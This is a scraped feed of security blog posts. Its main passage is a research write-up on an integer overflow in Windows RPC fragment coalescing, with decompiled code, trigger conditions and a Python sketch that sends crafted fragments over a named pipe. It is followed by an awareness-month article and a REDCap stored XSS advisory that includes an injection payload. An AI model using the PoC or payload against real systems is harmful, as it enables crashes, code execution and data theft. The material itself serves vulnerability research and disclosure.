                *(uint *)(this + 0x248) = uVar5;
/* overflow check 0x400000 */
                puVar17 = (uint *)(**(OSF_SCALL ***)(this + 0x138) + 0x148);
                if (*puVar17 <= uVar5 && uVar5 != *puVar17) {
                  piVar11 = local_50;
                  uVar18 = 0x1073;
                  local_50[0] = 3;
                  local_48 = uVar5;
                  goto goto_adderror_and_send_fault;
                }
// reallocate because fragment len is greater than the alloc hint used during first fragment! 
                lVar7 = GetBufferDo(**(OSF_SCALL ***)(this + 0x138),(void **)pdVar1,uVar5,1,
                                    *(uint *)(this + 0x1d8),in_stack_ffffffffffffff60);
                if (lVar7 != 0) goto fail;
              }
              uVar5 = local_res8[0];
              puVar17 = (uint *)(ulonglong)local_res8[0];
//copy fragment data into the alloced buffer
              memcpy((void *)((longlong)*(void **)pdVar1 + (ulonglong)*(uint *)(this + 0x1d8)),tcp_payload->data,local_res8[0]);
              *(uint *)(this + 0x1d8) = *(int *)(this + 0x1d8) + uVar5;
              if ((pkt_flags & 2) == 0) {
                return 0; // if it is not the last fragment return 0
              }
              goto dispatchRPCCall; // dispatch the request only if it is the last fragment
            }
      }
      else if (pkt_tyoe == 0) {
    /* here if the packet type is 0, i.e. request */
        if (*(int *)(this + 0x214) == 0) {
          ...               
          uVar15 = GetBufferDo(**(OSF_SCALL ***)(this + 0x138),(void **)pdVar1,uVar15,1, *(uint *)(this + 0x1d8),in_stack_ffffffffffffff60);
          pdVar14 = (dce_rpc_t *)(ulonglong)uVar15;
          if (uVar15 != 0) goto cleanupAndSendFault;
          ...
              memcpy((void *)((ulonglong)*(uint *)(this + 0x1d8) + *(longlong *)(this + 0xe0)), tcp_payload->data,uVar5);
          ...
              *(uint *)(this + 0x1d8) = *(int *)(this + 0x1d8) + uVar5;
              (**(code **)(**(longlong **)(this + 0x130) + 0x40))();
              if (*(int *)(this + 0x1d8) != *(int *)(this + 0x248)) {
                return 0;
              }
              if ((pkt_flags & 2) == 0) {
                *(undefined4 *)(this + 0x230) = 0;
              }
              else {
                *(undefined4 *)(this + 0x21c) = 3;
                if (((byte)this[0x2e0] & 4) != 0) {
                  LOCK();
                  *(uint *)(*(longlong *)(this + 0x130) + 0x1ac) =
                       *(uint *)(*(longlong *)(this + 0x130) + 0x1ac) & 0xfffffffd;
                  *(uint *)(this + 0x2e0) = *(uint *)(this + 0x2e0) & 0xfffffffb;
                }
              }
              plVar13 = (longlong *)0x0;
              goto Dispatch_rpc_call;
        }
        else{
          ...
          /* store frag len */
          uVar5 = local_res8[0];
          iVar8 = QUEUE::PutOnQueue((QUEUE *)(this + 600),tcp_payload->data,local_res8[0]);
          if (iVar8 == 0) {
          /* integer overflow! */
          *(uint *)(this + 0x24c) = *(int *)(this + 0x24c) + uVar5;
          ...
        }
}

Basically, the middle fragments are just copied into the allocated buffer under certain conditions.

DispatchRPCCall() seems to be the dispatcher for the full request: it calls the routine that handles the request, unmarshalling the parameters and executing the remotely invoked
procedure. It is interesting that:

undefined8 OSF_SCALL::DispatchRPCCall(longlong *param_1,longlong *param_2,undefined8 param_3)
{
  if (*(int *)((longlong)param_1 + 0x1cc) < 1) {
    *(undefined4 *)((longlong)param_1 + 0x214) = 1;
    ...
}

`*(int *)((longlong)param_1 + 0x1cc)` seems to be zero, so the instruction `*(undefined4 *)((longlong)param_1 + 0x214) = 1;` is executed.


Is it possible to force DispatchRpcCall() and still have fragments accepted for the same call id? The answer is yes!

Looking at ProcessReceivedPDU(), there is a path that leads to executing DispatchRpcCall() without ever sending a last fragment. The constraints:

  1. The server is configured with RPC_INTERFACE_HAS_PIPES -> the int at offset 0x58 in the rpc interface defined in the server has its second bit set to 1
  2. The client sends a first fragment, which initializes the call id object
  3. The client sends a second fragment with neither the first nor the last flag set; this ends up calling DispatchRpcCall(), which sets param_1 + 0x214 to 1
  4. The alloc hint sent by the client in the first fragment must be equal to the length of the copied buffer at the end of the second fragment

This leads the code to enter DispatchRpcCall() and causes the client’s subsequent fragments to be handled by the buggy code.

ulonglong OSF_SCALL::ProcessReceivedPDU (OSF_SCALL *this,dce_rpc_t *tcp_payload,uint len,int auth_fixed?){
  ...
            else if (pkt_tyoe == 0) {
                    /* here if the packet type is 0, i.e. request */
            if (*(int *)(this + 0x214) == 0) {
              puVar17 = (uint *)(ulonglong)local_res8[0];
              uVar15 = *(uint *)(this + 0x1d8) + local_res8[0];
              ...
              if (*(int *)(this + 0x1d8) != *(int *)(this + 0x248)) { // cheat on this to make fragments appear as the last!
                // 0x1d8 contain already copied bytes until this request!
                // 0x248 contains the alloc hint!
                return 0;
              }
              if ((pkt_flags & 2) == 0) {
                *(undefined4 *)(this + 0x230) = 0;
              }
              else {
                *(undefined4 *)(this + 0x21c) = 3;
                if (((byte)this[0x2e0] & 4) != 0) {
                  LOCK();
                  *(uint *)(*(longlong *)(this + 0x130) + 0x1ac) =
                       *(uint *)(*(longlong *)(this + 0x130) + 0x1ac) & 0xfffffffd;
                  *(uint *)(this + 0x2e0) = *(uint *)(this + 0x2e0) & 0xfffffffb;
                }
              }
              plVar13 = (longlong *)0x0;
              goto Dispatch_rpc_call;
  ...
}

At this point, it’s possible to write a PoC following the previous constraints; the PoC has been tested against my RPC server using the ncacn_np protocol.
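As a rough sketch of how such fragmented request PDUs could be built (this is illustrative and not the original PoC: the pipe name, opnum and context id are placeholders, and the initial bind/association PDU that a real client must send first is omitted):

import struct

PFC_FIRST_FRAG = 0x01
PFC_LAST_FRAG  = 0x02

def request_pdu(call_id, pfc_flags, alloc_hint, ctx_id, opnum, stub_data):
    # Connection-oriented DCE/RPC request PDU (ptype 0):
    # common header (16 bytes) + request header (8 bytes) + stub data.
    frag_len = 24 + len(stub_data)
    header = struct.pack("<BBBBIHHI",
                         5, 0,            # RPC version 5.0
                         0,               # ptype 0 = request
                         pfc_flags,
                         0x00000010,      # data representation: little-endian, ASCII
                         frag_len,
                         0,               # auth length
                         call_id)
    return header + struct.pack("<IHH", alloc_hint, ctx_id, opnum) + stub_data

# ncacn_np transport: write the PDUs to the server's named pipe (placeholder name).
pipe = open(r"\\.\pipe\target_rpc_endpoint", "r+b", buffering=0)

frag = b"A" * 0x100
# First fragment: alloc_hint chosen so that the accumulated length matches the hint,
# satisfying the this+0x1d8 vs this+0x248 condition and making DispatchRpcCall() run.
pipe.write(request_pdu(2, PFC_FIRST_FRAG, alloc_hint=len(frag), ctx_id=0, opnum=0, stub_data=frag))
# Middle fragments: neither FIRST_FRAG nor LAST_FRAG set, so they keep being queued/coalesced.
for _ in range(16):
    pipe.write(request_pdu(2, 0, alloc_hint=0, ctx_id=0, opnum=0, stub_data=frag))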

With this PoC, however, it seems impossible to trigger the vulnerability due to some checks in ProcessReceivedPDU(): basically, the check that makes it impossible to overflow the integer is performed on the queued message size.

OSF_SCALL::ProcessReceivedPDU()
{
  ...
              iVar8 = QUEUE::PutOnQueue((QUEUE *)(this + 600),tcp_payload->data,local_res8[0]);
              if (iVar8 == 0) {
                    /* integer overflow! */
                *(uint *)(this + 0x24c) = *(int *)(this + 0x24c) + uVar5;
                if (((pkt_flags & 2) != 0) &&
                   (*(undefined4 *)(this + 0x21c) = 3, ((byte)this[0x2e0] & 4) != 0)) {
                  LOCK();
                  *(uint *)(*(longlong *)(this + 0x130) + 0x1ac) =
                       *(uint *)(*(longlong *)(this + 0x130) + 0x1ac) & 0xfffffffd;
                  *(uint *)(this + 0x2e0) = *(uint *)(this + 0x2e0) & 0xfffffffb;
                }
                if (*(longlong *)(this + 0x18) != 0) {
                  if ((*(uint *)(this + 0x250) == 0) ||
                     ((*(uint *)(this + 0x24c) < *(uint *)(this + 0x250) &&
                      (*(int *)(this + 0x21c) != 3)))) {
                    if ((3 < *(int *)(this + 0x264)) &&
                       ((*(int *)(*(longlong *)(this + 0x130) + 0x18) != 0 &&
                        (uVar9 = 0, *(int *)(this + 0x21c) != 3)))) {
                      *(undefined4 *)(this + 0x2ac) = 1;
                      uVar9 = uVar19; // critical instruction that makes processreceivepdu return 1
                    }
                  }
                  else {
                    *(undefined4 *)(this + 0x250) = 0;
                    SCALL::IssueNotification((SCALL *)this,2);
                  }
                  RtlLeaveCriticalSection(pOVar3);
                  return uVar9;
                }
                if (((3 < *(int *)(this + 0x264)) &&
                    (*(int *)(*(longlong *)(this + 0x130) + 0x18) != 0)) &&
                   (*(int *)(this + 0x21c) != 3)) {
                  *(undefined4 *)(this + 0x2ac) = 1;
                  uVar9 = uVar19; // critical instruction that makes processreceivepdu return 1; my code entered here
                }
                RtlLeaveCriticalSection(pOVar3);
                SetEvent(*(HANDLE *)(this + 0x2c0));
                return uVar9; // 
              }
  ...

When ProcessReceivedPDU() returns 1, the server stops listening for new messages, so the client cannot trigger the vulnerability anymore.

LAB_18008ffc1:
        uVar8 = OSF_SCALL::ProcessReceivedPDU((OSF_SCALL *)this[0xf],tcp_received,uVar13,0);
        iVar4 = (int)uVar8;
      }
LAB_18003d2b5:
      if (iVar4 == 0) {
LAB_18003d3c3:
        (**(code **)(*this + 0x38))(); -> OSF_SCONNECTION::TransAsyncReceive() continues to read new packets from the descriptor
      }
      REFERENCED_OBJECT::RemoveReference(this);
      goto LAB_18003d2c5;
    }

In order not to enter the critical paths that make the server stop listening for new packets (on the same connection, of course), at least one of these conditions must not be satisfied:

3 < *(int *)(this + 0x264) // number of queued packets
*(int *)(*(longlong *)(this + 0x130) + 0x18) != 0 // don't know
*(int *)(this + 0x21c) != 3  // can be unsatisfied on the packet with the last fragment flag enabled

*(this + 0x21c) is set to 3 if the packet has the last fragment flag enabled.

The number of queued packets is incremented by PutOnQueue() and decremented by TakeOffQueue(); the queue can contain at most 4 packets. This seemed strange to me, because the application is multithreaded but behaved like a single-threaded one, simply because I didn’t see any TakeOffQueue() call during my experiments.

int __thiscall QUEUE::PutOnQueue(QUEUE *this,void *param_1,uint param_2)
{
  ...
  *(int *)(this + 0xc) = iVar6 + 1;
  **(void ***)this = param_1;
  *(uint *)(*(longlong *)this + 8) = param_2;
  return 0;
}


undefined8 QUEUE::TakeOffQueue(longlong *param_1,undefined4 *param_2)
{
  int iVar1;
  
  iVar1 = *(int *)((longlong)param_1 + 0xc);
  if (iVar1 == 0) {
    return 0;
  }
  *(int *)((longlong)param_1 + 0xc) = iVar1 + -1;
  *param_2 = *(undefined4 *)(*param_1 + -8 + (longlong)iVar1 * 0x10);
  return *(undefined8 *)(*param_1 + (longlong)*(int *)((longlong)param_1 + 0xc) * 0x10);
}

In general, my view of the server state was the following:

  1. A thread running somewhere in DispatchRpcCall() after the packet that forced the call to DispatchRpcCall() has been received, i.e. constraint number 3.
  2. A thread continuing to read from the transport, though I did not know from where.

So, I inspected DispatchRpcCall() more closely.

undefined8 OSF_SCALL::DispatchRPCCall(longlong *param_1,longlong *param_2,undefined8 param_3)
{
  ...
    uVar3 = RpcpConvertToLongRunning(this,param_2,param_3);
    bVar7 = (int)uVar3 != 0;
    if (bVar7) {
      uVar1 = 0xe;
    }
    else {
      this = (longlong *)param_1[0x26];
      uVar1 =  OSF_SCONNECTION::TransAsyncReceive(); // this should wake up a thread to handle new incoming packet
    }
    if (uVar1 == 0) {
      pOVar6 = (OSF_SCONNECTION *)param_1[0x26];
      DispatchHelper(param_1);
      if (*(int *)(pOVar6 + 0x18) == 0) { // this is the (this + 0x130) + 0x18)
        OSF_SCONNECTION::DispatchQueuedCalls(pOVar6);
      }
      pcVar4 = OSF_SCALL::RemoveReference(); // calling this means that the connection is over!
    }
    else {
      uVar3 = param_1[0x1c] - 0x18;
      if (uVar3 != 0) {
        BCACHE::Free((ulonglong)this,uVar3,param_3);
      }
      if (bVar7) {
        CleanupCallAndSendFault(param_1,(ulonglong)uVar1,0);
      }
      else {
        CleanupCall(param_1,uVar3,param_3);
      }
      pOVar6 = (OSF_SCONNECTION *)param_1[0x26];
      if (*(int *)(pOVar6 + 0x18) == 0) {
        OSF_SCONNECTION::AbortQueuedCalls(pOVar6);
        pOVar6 = (OSF_SCONNECTION *)param_1[0x26];
      }
  ...
}

int OSF_SCONNECTION::TransAsyncReceive(longlong *param_1,undefined8 param_2,undefined8 param_3)

{
  int iVar1;
  
  REFERENCED_OBJECT::AddReference((longlong)param_1,param_2,param_3);
  if (*(int *)(param_1 + 5) == 0) {
                    /* CO_Recv */
    iVar1 = CO_Recv(); // return true if a packet has been read
    if (iVar1 != 0) {
      if ((*(int *)(param_1 + 3) != 0) && (*(int *)((longlong)param_1 + 0x1c) == 0)) {
        OSF_SCALL::WakeUpPipeThreadIfNecessary((OSF_SCALL *)param_1[0xf],0x6be);
      }
      *(undefined4 *)(param_1 + 5) = 1;
      AbortConnection(param_1);
    }
  }
  else {
    AbortConnection(param_1);
    iVar1 = -0x3ffdeff8;
  }
  return iVar1;
}

ulonglong CO_Recv(PSLIST_HEADER param_1,undefined8 param_2,SIZE_T param_3)

{
  uint uVar1;
  ulonglong uVar2;
  
  if ((*(int *)&param_1[4].field_0x8 != 0) &&
     (*(int *)&param_1[4].field_0x8 == *(int *)&param_1[4].field_0x4)) {
    uVar1 = RPC_THREAD_POOL::TrySubmitWork(CO_RecvInlineCompletion,param_1);
    uVar2 = (ulonglong)uVar1;
    if (uVar1 != 0) {
      uVar2 = 0xc0021009;
    }
    return uVar2;
  }
  uVar2 = CO_SubmitRead(param_1,param_2,param_3); // ends in calling NMP_CONNECTION::Receive
  return uVar2;
}

According to my breakpoints, TransAsyncReceive() is executed, which leaves the server waiting for a new packet after the one that led to DispatchRpcCall(). If TransAsyncReceive() returns 0, the packet has been read and will be handled by another thread, and the code proceeds to call DispatchHelper(). At this point, I imagined two threads:

  1. A thread started from TransAsyncReceive() that handles new packets and enters ProcessReceivedPDU(), continuing to read until it returns 1.
  2. A thread that enters DispatchHelper().

So, I started to track the memory at (this + 0x130) + 0x18 to identify where it is set to 1: if it is not 0, the condition that leads ProcessReceivedPDU() to return 1 is no longer satisfied and the server keeps reading; if it is 0, a TakeOffQueue() is executed from DispatchRpcCall().

undefined8 OSF_SCALL::DispatchRPCCall(longlong *param_1,longlong *param_2,undefined8 param_3)
{
  ...
      if (*(int *)(pOVar6 + 0x18) == 0) {
        OSF_SCONNECTION::DispatchQueuedCalls(pOVar6);
      }
  ...
}

void __thiscall OSF_SCONNECTION::DispatchQueuedCalls(OSF_SCONNECTION *this)
{
  longlong *plVar1;
  undefined4 local_res8 [2];
  
  while( true ) {
    RtlEnterCriticalSection(this + 0x118);
    plVar1 = (longlong *)QUEUE::TakeOffQueue((longlong *)(this + 0x1b8),local_res8); // decrement no. queued messages
    if (plVar1 == (longlong *)0x0) break;
    RtlLeaveCriticalSection();
    OSF_SCALL::DispatchHelper(plVar1);
    ...
  }
  ...
  return;
}

(this + 0x130) + 0x18 is set to 1 during the association request, at offset rpcrt4.dll+0x38b99, only if the multiplexed packet flag is not set.

void OSF_SCONNECTION::AssociationRequested
               (OSF_SCONNECTION *param_1,dce_rpc_t *tcp_received,uint param_3,int param_4)
{

        if ((tcp_received->pkt_flags & 0x10U) == 0) {
          *(undefined4 *)(param_1 + 0x18) = 1;
          *(byte *)((longlong)pppppvVar21 + 3) = *(byte *)((longlong)pppppvVar21 + 3) | 3;
        }
}

So, setting RPC_HAS_PIPE in the server interface and specifying the MULTIPLEX flag during the connection (which is under client control) leads the code to the vulnerable point. At this point the debugger enters OSF_SCALL::GetCoalescedBuffer(), which contains another vulnerable call.

The code gets here via this stack trace:

rpcrt4.dll+0xb404d in OSF_SCALL::Receive()
rpcrt4.dll+0x4b297 in RPC_STATUS I_RpcReceive()
rpcrt4.dll+0x82422 in NdrpServerInit()
rpcrt4.dll+0x1c35e in NdrStubCall2()
                      NdrServerCall2()
rpcrt4.dll+0x57832 in DispatchToStubInCNoAvrf()
rpcrt4.dll+0x39e00 in RPC_INTERFACE::DispatchToStubWorker()
rpcrt4.dll+0x39753 in DispatchToStub()
rpcrt4.dll+0x3a2bc in OSF_SCALL::DispatchHelper()
                      DispatchRPCCall()

So, using this PoC, every n packets we enter the coalesced-buffer path, triggering the second integer overflow.

The routine OSF_SCALL::GetCoalescedBuffer() is reached only because the server has RPC_HAS_PIPE configured. Analyzing the stack trace from the last function before OSF_SCALL::GetCoalescedBuffer(), I looked for the constraints I had satisfied that led me to the vulnerable code.

long __thiscall OSF_SCALL::Receive(OSF_SCALL *this,_RPC_MESSAGE *param_1,uint param_2)
{
  ...
      while (iVar3 = *(int *)(this + 0x21c), iVar3 != 1) { // this + 0x21c does not seem to be set to 1 in ProcessReceivedPDU; did not find where it is set
        
        if (iVar3 == 2) {
          return *(long *)(this + 0x20);
        }
        if (iVar3 == 3) { // it is equal to 3 on the last frag packet, from ProcessReceivedPDU
          lVar2 = GetCoalescedBuffer(this,param_1,iVar4);
          return lVar2; // last frag received -> no more packets will be waited!
        }
        // if the total queued packets length is less or equal to the allocation hint received than wait for new data
        if (*(uint *)(this + 0x24c) <= (uint)*(ushort *)(*(longlong *)(this + 0x130) + 0xb8)) {
          EVENT::Wait((EVENT *)(this + 0x2c0),-1); // wait for other packets
        }
        else { 
          lVar2 = GetCoalescedBuffer(this,param_1,iVar4); // run coalesced buffer
          if (lVar2 != 0) { // error
            return lVar2;
          }
          ...
        }
        ...
      }
  ...
}

// (uint)*(ushort *)(*(longlong *)(this + 0x130) + 0xb8) is set during the association request
void OSF_SCONNECTION::AssociationRequested
               (OSF_SCONNECTION *param_1,dce_rpc_t *tcp_received,uint param_3,int param_4)
{
  ...
    uVar18 = *(ushort *)((longlong)&tcp_received->alloc_hint + 2);
    if ((*(byte *)&tcp_received->data_repres & 0xf0) != 0x10) {
      uVar26 = *(uint *)&tcp_received->cxt_id;
      uVar23 = uVar23 >> 8 | uVar23 << 8;
      uVar18 = uVar18 >> 8 | uVar18 << 8;
      *(ushort *)((longlong)&tcp_received->alloc_hint + 2) = uVar18;
      *(uint *)&tcp_received->cxt_id =
           uVar26 >> 0x18 | (uVar26 & 0xff0000) >> 8 | (uVar26 & 0xff00) << 8 | uVar26 << 0x18;
      *(ushort *)&tcp_received->alloc_hint = uVar23;
    }
    puVar24 = (undefined4 *)(ulonglong)uVar23;
    uVar14 = (ushort)*(undefined4 *)(*(longlong *)(param_1 + 0x20) + 0x4c);
    uVar3 = 0xffff;
    if (uVar23 != 0xffff) {
      uVar3 = uVar23;
    }
    if (uVar3 <= uVar18) {
      uVar18 = uVar3;
    }
    if (uVar18 <= uVar14) {
      uVar14 = uVar18;
    }
    *(ushort *)(param_1 + 0xb8) = uVar14 & 0xfff8; // set equal to the allocation hint & 0xfff8 of the first association packet!
  ...
}

Basically, from OSF_SCALL::Receive() the code continuously waits for new packets until a last-fragment packet is received or an error occurs.

GetCoalescedBuffer() is called if the last fragment is received or if the total length accumulated during ProcessReceivedPDU() is greater than the alloc_hint; because of these conditions it is called every n packets.

So, just by increasing the fragment length in the PoC it’s possible to trigger GetCoalescedBuffer() without setting MULTIPLEX. Moreover, OSF_SCALL::Receive() is reached because Message->RpcFlags & 0x8000 == 0.

RPC_STATUS I_RpcReceive(PRPC_MESSAGE Message,uint Size)
{
  ...
    if ((Message->RpcFlags & 0x8000) == 0) {
                    /* get  OSF_SCALL::Receive address */
      pcVar5 = *(code **)(*plVar7 + 0x38);
    }
    else {
                    /* get NDRServerInitializeMarshall address */
      pcVar5 = *(code **)(*plVar7 + 0x48);
    }
                    /* call coalesced buffer */
    uVar2 = (*pcVar5)();
  ...
}

void NdrpServerInit()
{
  ...
    if (param_5 == 0) {
      if ((*(byte *)(*(ushort **)(puVar2 + 0x10) + 2) & 8) == 0) {
        ...

        ...
        if ((param_2->RpcFlags & 0x1000) == 0) {  // During my tests this value was 0 each time; didn't investigate when this could fail
        param_2->RpcFlags = 0x4000;               // causes GetCoalescedBuffer() to be called
        puStackY96 = (undefined *)0x180082427;
        exception = I_RpcReceive(param_2,0);
        if (exception != 0) {
                    /* WARNING: Subroutine does not return */
          puStackY96 = &UNK_180082432;
          RpcRaiseException(exception);
        }
        param_1->Buffer = (uchar *)param_2->Buffer;
        puVar10 = (uchar *)param_2->Buffer;
        param_1->BufferStart = puVar10;
        param_1->BufferEnd = puVar10 + param_2->BufferLength;
        param_3 = pMVar20;
      }
  ...
}

GetCoalescedBuffer() is used to merge the queued buffers with the last received packet that has not been queued: it allocates the total length needed and then copies every queued message into it.

long __thiscall OSF_SCALL::GetCoalescedBuffer(OSF_SCALL *this,_RPC_MESSAGE *param_1,int param_2)
{
  ...
  iVar5 = *(int *)(this + 0x24c);
  if (iVar5 != 0) {
    if (uVar3 != 0) {
  /* integer overflow */
      iVar5 = iVar5 + *(int *)(param_1 + 0x18);
    }
    lVar2 = OSF_SCONNECTION::TransGetBuffer((OSF_SCONNECTION *)this_00,&local_res8,iVar5 + 0x18);
    if (lVar2 == 0) {
      dst_00 = (void *)((longlong)local_res8 + 0x18);
      dst = dst_00;
      local_res8 = dst_00;
      if ((uVar3 != 0) && (*(void **)(param_1 + 0x10) != (void *)0x0)) {
        memcpy(dst_00,*(void **)(param_1 + 0x10),*(uint *)(param_1 + 0x18));
        local_res8 = (void *)((ulonglong)*(uint *)(param_1 + 0x18) + (longlong)dst_00);
        OSF_SCONNECTION::TransFreeBuffer() // free last message PDU received
  ...
      }
      while (src = (void *)QUEUE::TakeOffQueue((longlong *)(this + 600),(undefined4 *)&local_res8), src != (void *)0x0) { 
        // loop to consume the queue merging the queued packets
        uVar4 = (ulonglong)local_res8 & 0xffffffff;
        memcpy(dst,src,(uint)local_res8);
                    /* OSF_SCONNECTION::TransFreeBuffer  */
        OSF_SCONNECTION::TransFreeBuffer() // free PDU buffer queued
        dst = (void *)((longlong)dst + uVar4);
      }
      ...
      *(undefined4 *)(this + 0x24c) = 0;
      ...
}

At this point, merging the newly found constraints with the old ones, it’s possible to summarize the conditions that lead to the vulnerable point:

  1. The server is configured with RPC_INTERFACE_HAS_PIPES -> the integer at offset 0x58 in the rpc interface defined in the server has its second bit set to 1 - **Not under attacker control**
  2. The client sends a first fragment that initializes the call id object and satisfies the condition to call DispatchRpcCall() directly, by sending a fragment exactly as long as the alloc hint: this way the early return guarded by (*(int *)(this + 0x1d8) != *(int *)(this + 0x248)) in ProcessReceivedPDU() is skipped, DispatchRpcCall() is executed, and param_1 + 0x214 is set to 1 - Under attacker control
  3. The client continues to send middle fragments until iVar5 = iVar5 + *(int *)(param_1 + 0x18); overflows, leading memcpy() to overflow the buffer - Under attacker control

Bad points:

  1. The fragment length field is only two bytes long, which makes exploitation very hard because it is time and memory consuming - Under attacker control, highly constrained
  2. I found no way to cheat on the fragment length value versus the bytes actually sent, i.e. they must be consistent with each other.

This requires sending a very large number of fragments, and consequently exploitation may be impossible due to system memory: just before the request that overflows the integer, the server must be able to allocate almost 4 GB of memory for the coalesced buffer. If the memory cannot be allocated, an exception is raised. Even assuming the RPC server can allocate more than 4 GB, there is the problem of time: the number of packets to send is very large, and the processing time per packet increases enormously with the total length of the queued data.
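A rough back-of-the-envelope estimate of the cost (assuming roughly 64 KB of stub data per PDU, since the fragment length field is 16 bits; the exact per-fragment maximum depends on the negotiated max fragment size):

MAX_FRAG_DATA = 0xFFF8        # assumed usable stub bytes per fragment (16-bit frag length, negotiated down to a multiple of 8)
WRAP = 0x100000000            # point at which the 32-bit accumulator at this+0x24c wraps

fragments_needed = -(-WRAP // MAX_FRAG_DATA)     # ceiling division
print(fragments_needed)                          # 65539 fragments
print(fragments_needed * MAX_FRAG_DATA / 2**30)  # ~4.0 GiB that the server has to queue and coalesce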

My final PoC is available here; below, the debugger is shown at the breakpoint on the vulnerable add operation in the buffer-coalescing function.

Embedding Payloads and Bypassing Controls in Microsoft InfoPath

18 June 2022 at 10:00
While browsing a SharePoint instance recently, I came across an interesting URL. The page itself displayed a web form that submitted data to SharePoint. Intrigued by the .xsn extension, I downloaded the file and started investigating what turned out to be Microsoft InfoPath’s template format. Along the way, I discovered parts of the specification that enabled loading remote payloads, bypassing warning dialogs, and other interesting behaviour.

Why a successful Cyber Security Awareness month starts … now!

17 June 2022 at 08:00

Have you noticed that it’s June already?! Crazy how fast time flies by when you’re busy. But Q2 of 2022 is almost ready to be closed, so why not have a peek at what the second half of the year has in store for us? Summer holidays, you say? Sandy beaches and happy-hour cocktails? Or cool mountain air and challenging MTB tracks? Messily written out-of-office messages, kindly asking to park that question till early September?

Yes. It’s all that. But there is more. For us, it’s October that is highlighted.
October is Cyber Security Awareness Month, the peak season for Security Awareness professionals (and enthusiasts 😉). In Europe, the European Cybersecurity Month (ECSM) has taken place every year since 2013 and has been incorporated in the implementing actions of the Cybersecurity Act (CSA). The focus on making it a yearly recurring event is strong and in today’s world we might need this initiative to spotlight security awareness more than ever.

But October is still 3 months away…

3 reasons why a successful Cyber Security Awareness Month starts NOW!

1. Take your time to get inspired

Cyber Security is a specific yet very broad domain. There are endless topics to cover, levels of complexity, target audiences… Needless to say, pinpointing your focus for Cyber Month won’t be easy. Depending on the available time and budget it may be difficult to pick the best approach. That is why it is important to take your time to get inspired. How? Here are some ideas.

  • Take a step back and review what you have already covered in previous quarters. Which topics went down extremely well with your target audience? Which ones didn’t, and why?
  • Which topics are people already familiar with? It might be a good idea to remind your team of what they already know instead of overwhelming them with only new content;
  • Do not let a good incident go to waste!
    • Make sure to involve the technical teams managing security and dig  for input on “real” incidents. Showing people what happened or might happen makes security more tangible;
    • Use security awareness topics that are trending in the local media as a coat rack for the message you want to bring across;
  • Check what other organizations are talking about this year. Is it relevant for you? No need to reinvent the wheel 😉
  • Keep it simple. Focus on 1 topic and make it really stick.

2. Organizing impactful activities takes time!

Once you have a clear view on the topic to cover and the message you want to bring across, it’s important to consider how you want to do that. And let’s be honest, if you really want to make an impact during Cyber Month, sending a boring email that is all work and no play isn’t going to cut it. There is no magic formula but there are a few things that you could consider:

  • Triggers and motivation: typically, Cyber Security Awareness Month allows us to be more playful than during the rest of the year. Why not use different triggers too?
  • Get emotions running: testimonials are among the most relatable tools you can use. Be careful with the balance between “scary” and “empowering” stories!
  • Talk to the informed ones: propose an in-depth approach with extra-professional resources, panel discussions, external speakers…
  • Roll up your sleeves: most of us learn by doing. That is why games, experience workshops and 1-to-1 demos work well.

Make sure you have a good motivation to attract your people.

  • Contests with a final gift are a classic, but you only need to attend a professional fair to see those still work. 
  • Goodies? They require budget, and physical items may draw negative attention by being perceived as wasteful. Are we against them? No, but choose carefully.
  • Make sure you have a good “how this will improve your life” story. Remember that protecting your family and friends is a better motivator than protecting your company (OK, that is not much of a secret).

You can read in our blog how we applied all this last year or reach out for a demo.


3. Get your stakeholders on board early

Cyber Month is not a one-person (or one-team) show. No matter how inspiring your activities, if you are running it alone it will be very difficult to bring your message across. That’s why it is crucial to start promoting Cyber Month early towards all stakeholders, often even before you have anything planned. Getting all of your ducks in a row before summer will give you peace of mind when organizing and planning later on.

Here are a few stakeholders to consider, and why*:

  • Top Management: money and support!
  • Communications: to make sure you reserve a spot for cyber month on all communication channels (weekly newsletters, intranet, emails, cctv, social media, …);
  • Technical teams: back to the “inspiration” argument. And of course to validate content.
  • HR: to help you define and identify target audiences and DOs / DON’Ts in the organization.

*Depending on the size of organisation there might be more or less stakeholders to consider.

“Oops! I wish I had read this 2 months ago”

Are you reading this on the 20th of September? €0 left in your budget?
Don’t panic. Even with time and money constraints, there is good, generic content freely available on the internet covering at least the top 10 most common current threats. It’s usually even tweakable to make it look and feel branded for your own organisation.

ENISA, the European Union Agency for Cybersecurity, coordinates the organisation of the European Cybersecurity Month (ECSM) and acts as a “hub” for all participating Member States and EU Institutions. The Agency also publishes new materials on a yearly basis.

A great resource in Belgium is Safeonweb, an initiative of the Centre for Cyber Security Belgium that also launches a new campaign every year.

If nothing else, these will provide a good starting point. And next year, make sure you start early on!

About the authors

Hannelore Goffin is an experienced consultant within the Cyber Strategy team at NVISO where she is passionate about raising awareness on all cyber related topics, both for the professional and personal context. 

Mercedes M Diaz leads NVISO’s Cyberculture practice. She supports businesses trying to reduce their risks by helping teams understand their role in protecting the company.

CVE-2022-24004 & CVE-2022-24127: Vanderbilt REDCap – Stored Cross Site Scripting

15 June 2022 at 09:00

Nettitude identified two stored Cross Site Scripting (XSS) vulnerabilities within Vanderbilt REDCap.  These have been assigned CVE-2022-24004 & CVE-2022-24127.

REDCap is a web application which allows the creation and management of online surveys for research purposes. Version 12.0.11 and below allows a remote authenticated attacker to inject arbitrary JavaScript or HTML via the Messenger functionality and the administration interface.

CVE-2022-24004 – Proof of Concept

REDCap has a built in messenger function which allows all registered users to communicate within the application. Each conversation created has a title which can only be edited by the user which originally created the conversation. The input field where this title can be edited does not filter input and as a result, it is possible to inject malicious JavaScript and HTML.

Example POST data sent to Messenger_ajax.php:

action=change-conversationtitle&thread_id=7&new_title=%22+onclick%3Dalert(document.location)+&username=m17664jp&limit=8&redcap_csrf_token=1c5c586a0e3d614dfba3401a1dd92f508d4f915a

This payload will then trigger in the browser of any user who is a participant in the conversation, whenever the messenger sidebar is toggled. The following screenshot shows that the payload is injected into the data-tooltip parameter of the h4 tag.

For this simple proof of concept, the user would have to click on the message title, resulting in the execution of a JavaScript alert.

[Screenshot: payload injected into the data-tooltip attribute of the h4 tag]

The impact of this vulnerability could lead to the disclosure of sensitive application and survey data. Given that the messenger functionality will autocomplete usernames after providing the first character, it is possible to see how an attacker could create a conversation with all application users to maximise chances of compromising application data from an administrator user.

Nettitude demonstrated the impact of this to the application vendor by further improving the proof of concept to automatically trigger on page load and scrape the contents of the user’s screen, sending this data to a remote server.

CVE-2022-24004 – Affected Component

This vulnerability affects REDCap version 12.0.11. Previous versions may also be affected.

  • Vulnerable page: Messenger_ajax.php
  • Vulnerable parameter: new_title

CVE-2022-24127 – Proof of Concept

